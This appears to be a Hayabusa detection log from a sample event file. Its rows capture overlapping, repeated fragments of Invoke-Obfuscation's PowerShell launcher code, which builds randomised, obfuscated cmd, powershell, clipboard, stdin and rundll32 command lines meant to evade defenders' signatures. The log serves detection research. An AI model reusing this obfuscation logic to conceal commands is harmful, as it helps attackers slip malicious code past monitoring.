$Char.ToString().ToUpper()} $Char}) -Join '' $VariableName2 = ([Char[]]$VariableName2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random syntax for invoking process-level environment variable syntax. $InvokeOption = Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName # Add additional escaping for vertical pipe (and other characters defined below) if necessary since this is going inside an environment variable for the final $CmdLineOutput set below. ForEach($Char in @('<','>','|','&')) { If($InvokeOption.Contains(""^$Char"")) { $InvokeOption = $InvokeOption.Replace(""^$Char"",""^^^$Char"") } } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + ' '*(Get-Random -Minimum 1 -Maximum 3) + $InvokeOption $CmdSyntax2 = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 2) + ""%$VariableName2%"" $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + $SetSyntax + $ScriptString + '&&' + $SetSyntax2 + $PathToPowerShell + $PSCmdSyntax + '&&' + ' '*(Get-Random -Minimum 0 -Maximum 4) + $PathToCmd + $CmdSyntax2 + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax2) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 9 { ############# ## STDIN++ ## ############# # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking command stored in process-level environment variable. # Generate random variable names to store the $ScriptString command and PowerShell syntax. $CharsForVarName = @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $VariableName = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName2 = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName2 = ([Char[]]$VariableName2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random case syntax for setting the above random variable names. $SetSyntax = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax = $SetSyntax + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName + '=' $SetSyntax2 = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax2 = $SetSyntax2 + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName2 + '=' # Generate numerous ways to invoke with $ExecutionContext as a variable, including Get-Variable varname, Get-ChildItem Variable:varname, Get-Item Variable:varname, etc. $ExecContextVariable = @() $ExecContextVariable += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + 'variable:' + (Get-Random -Input @('Ex*xt','E*",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.296 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"splay the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + $InvokeVariableSyntax $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + $SetSyntax + $ScriptString + '&&' + ' '*(Get-Random -Minimum 0 -Maximum 4) + $PathToPowerShell + $PSCmdSyntax + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 6 { ############ ## STDIN+ ## ############ # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking powershell.exe's StdIn. $PowerShellStdin = Out-RandomPowerShellStdInInvokeSyntax # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + $PowerShellStdin $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $Echo + (Get-Random -Input ('/','\',' '*(Get-Random -Minimum 1 -Maximum 3))) + $ScriptString + ' '*(Get-Random -Minimum 1 -Maximum 3) + '|' + ' '*(Get-Random -Minimum 1 -Maximum 3) + $PathToPowerShell + $PSCmdSyntax + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 7 { ########### ## CLIP+ ## ########### # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking powershell.exe's StdIn. $PowerShellClip = Out-RandomClipboardInvokeSyntax # If this launcher is run in PowerShell 2.0 then Single-Threaded Apartment must be specified with -st or -sta. # Otherwise you will get the following error: ""Current thread must be set to single thread apartment (STA) mode before OLE calls can be made."" # Since Invoke-Obfuscation output is designed to run on any PowerShell version then for this launcher we will add the -st/-sta flag to $PowerShellFlags. # If selected then the -Command flag needs to remain last (where it currently is). $CommandFlagValue = $NULL If($PSBoundParameters['Command'] -OR $Command) { $UpperLimit = $PowerShellFlagsArray.Count-1 $CommandFlagValue = $PowerShellFlagsArray[$PowerShellFlagsArray.Count-1] } Else { $UpperLimit = $PowerShellFlagsArray.Count } # Re-extract PowerShellFlags so we can add in -st/-sta and then reorder (maintaining command flag at the end if present). $PowerShellFlags = @() For($i=0; $i -lt $UpperLimit; $i++) { $PowerShellFlags += $PowerShellFlagsArray[$i] } # Add in -st/-sta to PowerShellFlags. $PowerShellFlags += (Get-Random -Input @('-st','-sta')) # Randomize the order of the command-line arguments. # This is to prevent the Blue Team from placing false hope in simple signatures for consistent ordering of these arguments. If($PowerShellFlags.Count -gt 1) { $PowerShellFlags = Get-Random -InputObject $PowerShellFlags -Count $PowerShellFlags.Count } # If selected then the -Command flag needs to be added last. If($CommandFlagValue) { $PowerShellFlags += $CommandFlagValue } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Insert random-length whitespace between all command-line arguments. $PowerShellFlags = ($PowerShellFlags | ForEach-Object {$_ + ' '*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $PowerShellFlags = ' '*(Get-Random -Minimum 1 -Maximum 3) + $PowerShellFlags + ' '*(Get-Random -Minimum 1 -Maximum 3) # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + $PowerShellClip $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $Echo + (Get-Random -Input ('/','\',' '*(Get-Random -Minimum 1 -Maximum 3))) + $ScriptString + ' '*(Get-Random -Minimum 0 -Maximum 2) + '|' + ' '*(Get-Random -Minimum 0 -Maximum 2) + $PathToClip + ' '*(Get-Random -Minimum 0 -Maximum 2) + '&&' + ' '*(Get-Random -Minimum 1 -Maximum 3) + $PathToPowerShell + $PSCmdSyntax + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 8 { ########### ## VAR++ ## ########### # Undo some escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^^') } # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking command stored in process-level environment variable. # Generate random variable names to store the $ScriptString command and PowerShell syntax. $CharsForVarName = @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $VariableName = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName2 = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName2 = ([Char[]]$VariableName2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random case syntax for setting the above random variable names. $SetSyntax = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax = $SetSyntax + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName + '=' $SetSyntax2 = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax2 = $SetSyntax2 + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName2 + '=' # Randomize the case of the following variables. $SetSyntax = ([Char[]]$SetSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax2 = ([Char[]]$SetSyntax2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName2 = ([Char[]]$VariableName2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random syntax for invoking process-level environment variable syntax. $InvokeOption = Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName # Add additional escaping for vertical pipe (and other characters defined below) if necessary since this is going inside an environment variable for the final $CmdLineOutput set below. ForEach($Char in @('<','>','|','&')) { If($InvokeOption.Contains(""^$Char"")) { $InvokeOption = $InvokeOption.Replace(""^$Char"",""^^^$Char"") } } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + ' '*(Get-Random -Minimum 1 -Maximum 3) + $InvokeOption $CmdSyntax2 = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 2) + ""%$VariableName2%"" $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + $SetSyntax + $ScriptString + '&&' + $SetSyntax2 + $PathToPowerShell + $PSCmdSyntax + '&&' + ' '*(Get-Random -Minimum 0 -Maximum 4) + $PathToCmd + $CmdSyntax2 + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax2) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 9 { ############# ## STDIN++ ## ############# # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking command stored in process-level environment variable. # Generate random variable names to store the $ScriptString command and PowerShell syntax. $CharsForVarName = @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $VariableName = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName2 = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName2 = ([Char[]]$VariableName2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random case syntax for setting the above random variable names. $SetSyntax = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax = $SetSyntax + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName + '=' $SetSyntax2 = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax2 = $SetSyntax2 + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName2 + '=' # Generate numerous ways to invoke with $ExecutionContext as a variable, including Get-Variable varname, Get-ChildItem Variable:varname, Get-Item Variable:varname, etc. $ExecContextVariable = @() $ExecContextVariable += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + 'variable:' + (Get-Random -Input @('Ex*xt','E*",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.296 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"t','*xec*t','*ecu*t','*cut*t','*cuti*t','*uti*t','E*ext','E*xt','E*Cont*','E*onte*','E*tex*','ExecutionContext')) + ').Value' # Select random option from above. $ExecContextVariable = Get-Random -Input $ExecContextVariable # Generate numerous ways to invoke command stored in environment variable. $GetRandomVariableSyntax = @() $GetRandomVariableSyntax += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + 'env:' + $VariableName + ').Value' $GetRandomVariableSyntax += ('(' + '[Environment]::GetEnvironmentVariable(' + ""'$VariableName'"" + ',' + ""'Process'"" + ')' + ')') # Select random option from above. $GetRandomVariableSyntax = Get-Random -Input $GetRandomVariableSyntax # Generate random Invoke-Expression/IEX/$ExecutionContext syntax. $InvokeOptions = @() $InvokeOptions += (Get-Random -Input ('IEX','Invoke-Expression')) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $GetRandomVariableSyntax $InvokeOptions += (Get-Random -Input @('$ExecutionContext','${ExecutionContext}',$ExecContextVariable)) + '.InvokeCommand.InvokeScript(' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $GetRandomVariableSyntax + ' '*(Get-Random -Minimum 0 -Maximum 3) + ')' # Select random option from above. $InvokeOption = Get-Random -Input $InvokeOptions # Randomize the case of the following variables. $SetSyntax = ([Char[]]$SetSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax2 = ([Char[]]$SetSyntax2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName2 = ([Char[]]$VariableName2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $InvokeOption = ([Char[]]$InvokeOption.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $ExecContextVariable = ([Char[]]$ExecContextVariable.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $GetRandomVariableSyntax = ([Char[]]$GetRandomVariableSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random syntax for invoking process-level environment variable syntax. $InvokeVariableSyntax = Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName # Choose random syntax for invoking powershell.exe's StdIn. $PowerShellStdin = Out-RandomPowerShellStdInInvokeSyntax # Undo some escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""^$Char"")} If($PowerShellStdin.Contains(""^$Char"")) {$PowerShellStdin = $PowerShellStdin.Replace(""^$Char"",""^^^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^^') } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + ' '*(Get-Random -Minimum 1 -Maximum 3) + $PowerShellStdin + ' '*(Get-Random -Minimum 0 -Maximum 3) $CmdSyntax2 = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 2) + ""%$VariableName2%"" $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + $SetSyntax + ' '*(Get-Random -Minimum 0 -Maximum 3)+ $ScriptString + ' '*(Get-Random -Minimum 0 -Maximum 3) + '&&' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $SetSyntax2 + $Echo + ' '*(Get-Random -Minimum 1 -Maximum 3) + $InvokeOption + ' '*(Get-Random -Minimum 0 -Maximum 3) + '^|' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $PathToPowerShell + $PSCmdSyntax + '&&' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $PathToCmd + $CmdSyntax2 + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax2) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 10 { ############ ## CLIP++ ## ############ # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking powershell.exe's StdIn. $PowerShellClip = Out-RandomClipboardInvokeSyntax # Since we're embedding $PowerShellClip syntax one more process deep we need to double-escape & < > and | characters for cmd.exe. ForEach($Char in @('<','>','|','&')) { # Remove single escaping and then escape all characters. This will handle single-escaped and not-escaped characters. If($PowerShellClip.Contains(""^$Char"")) { $PowerShellClip = $PowerShellClip.Replace(""^$Char"",""^^^$Char"") } } # If this launcher is run in PowerShell 2.0 then Single-Threaded Apartment must be specified with -st or -sta. # Otherwise you will get the following error: ""Current thread must be set to single thread apartment (STA) mode before OLE calls can be made."" # Since Invoke-Obfuscation output is designed to run on any PowerShell version then for this launcher we will add the -st/-sta flag to $PowerShellFlags. # If selected then the -Command flag needs to remain last (where it currently is). $CommandFlagValue = $NULL If($PSBoundParameters['Command'] -OR $Command) { $UpperLimit = $PowerShellFlagsArray.Count-1 $CommandFlagValue = $PowerShellFlagsArray[$PowerShellFlagsArray.Count-1] } Else { $UpperLimit = $PowerShellFlagsArray.Count } # Re-extract PowerShellFlags so we can add in -st/-sta and then reorder (maintaining command flag at the end if present). $PowerShellFlags = @() For($i=0; $i -lt $UpperLimit; $i++) { $PowerShellFlags += $PowerShellFlagsArray[$i] } # Add in -st/-sta to PowerShellFlags. $PowerShellFlags += (Get-Random -Input @('-st','-sta')) # Randomize the order of the command-line arguments. # This is to prevent the Blue Team from placing false hope in simple signatures for consistent ordering of these arguments. If($PowerShellFlags.Count -gt 1) { $PowerShellFlags = Get-Random -InputObject $PowerShellFlags -Count $PowerShellFlags.Count } # If selected then the -Command flag needs to be added last. If($CommandFlagValue) { $PowerShellFlags += $CommandFlagValue } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Insert random-length whitespace between all command-line arguments. $PowerShellFlags = ($PowerShellFlags | ForEach-Object {$_ + ' '*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $PowerShellFlags = ' '*(Get-Random -Minimum 1 -Maximum 3) + $PowerShellFlags + ' '*(Get-Random -Minimum 1 -Maximum 3) # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + $PowerShellClip $CmdSyntax2 = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + $PathToPowerShell + $PsCmdSyntax $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $Echo + (Get-Random -Input ('/','\',' '*(Get-Random -Minimum 1 -Maximum 3))) + $ScriptString + ' '*(Get-Random -Minimum 0 -Maximum 2) + '|' + ' '*(Get-Random -Minimum 0 -Maximum 2) + $PathToClip + ' '*(Get-Random -Minimum 0 -Maximum 2) + '&&' + $PathToCmd + $CmdSyntax2 + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax2) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 11 { ############## ## RUNDLL++ ## ############## # Shout out and big thanks to Matt Graeber (@mattifestation) for pointing out this method of executing any binary directly from rundll32.exe. # Undo one layer of escaping from beginning of function since we're only dealing with one level of cmd.exe escaping in this block. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^^') } # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking command stored in process-level environment variable. # Generate random variable names to store the $ScriptString command and PowerShell syntax. $CharsForVarName = @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $VariableName = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random case syntax for setting the above random variable names. $SetSyntax = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax = $SetSyntax + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName + '=' # Randomize the case of the following variables. $SetSyntax = ([Char[]]$SetSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random syntax for invoking process-level environment variable syntax. $InvokeOption = (Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName).Replace('\""',""'"").Replace('`','') # Generate random case syntax for SHELL32.DLL argument for RunDll32.exe. $Shell32Dll = ([Char[]]'SHELL32.DLL' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Put the execution flags in the format required by rundll32.exe: each argument separately encapusulated in double quotes. $ExecutionFlagsRunDllSyntax = ($PowerShellFlagsArray | Where-Object {$_.Trim().Length -gt 0} | ForEach-Object {'""' + ' '*(Get-Random -Minimum 0 -",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.296 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"t','*xec*t','*ecu*t','*cut*t','*cuti*t','*uti*t','E*ext','E*xt','E*Cont*','E*onte*','E*tex*','ExecutionContext')) + ').Value' # Select random option from above. $ExecContextVariable = Get-Random -Input $ExecContextVariable # Generate numerous ways to invoke command stored in environment variable. $GetRandomVariableSyntax = @() $GetRandomVariableSyntax += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + 'env:' + $VariableName + ').Value' $GetRandomVariableSyntax += ('(' + '[Environment]::GetEnvironmentVariable(' + ""'$VariableName'"" + ',' + ""'Process'"" + ')' + ')') # Select random option from above. $GetRandomVariableSyntax = Get-Random -Input $GetRandomVariableSyntax # Generate random Invoke-Expression/IEX/$ExecutionContext syntax. $InvokeOptions = @() $InvokeOptions += (Get-Random -Input ('IEX','Invoke-Expression')) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $GetRandomVariableSyntax $InvokeOptions += (Get-Random -Input @('$ExecutionContext','${ExecutionContext}',$ExecContextVariable)) + '.InvokeCommand.InvokeScript(' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $GetRandomVariableSyntax + ' '*(Get-Random -Minimum 0 -Maximum 3) + ')' # Select random option from above. $InvokeOption = Get-Random -Input $InvokeOptions # Randomize the case of the following variables. $SetSyntax = ([Char[]]$SetSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax2 = ([Char[]]$SetSyntax2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName2 = ([Char[]]$VariableName2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $InvokeOption = ([Char[]]$InvokeOption.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $ExecContextVariable = ([Char[]]$ExecContextVariable.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $GetRandomVariableSyntax = ([Char[]]$GetRandomVariableSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random syntax for invoking process-level environment variable syntax. $InvokeVariableSyntax = Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName # Choose random syntax for invoking powershell.exe's StdIn. $PowerShellStdin = Out-RandomPowerShellStdInInvokeSyntax # Undo some escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""^$Char"")} If($PowerShellStdin.Contains(""^$Char"")) {$PowerShellStdin = $PowerShellStdin.Replace(""^$Char"",""^^^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^^') } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + ' '*(Get-Random -Minimum 1 -Maximum 3) + $PowerShellStdin + ' '*(Get-Random -Minimum 0 -Maximum 3) $CmdSyntax2 = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 2) + ""%$VariableName2%"" $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + $SetSyntax + ' '*(Get-Random -Minimum 0 -Maximum 3)+ $ScriptString + ' '*(Get-Random -Minimum 0 -Maximum 3) + '&&' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $SetSyntax2 + $Echo + ' '*(Get-Random -Minimum 1 -Maximum 3) + $InvokeOption + ' '*(Get-Random -Minimum 0 -Maximum 3) + '^|' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $PathToPowerShell + $PSCmdSyntax + '&&' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $PathToCmd + $CmdSyntax2 + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax2) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 10 { ############ ## 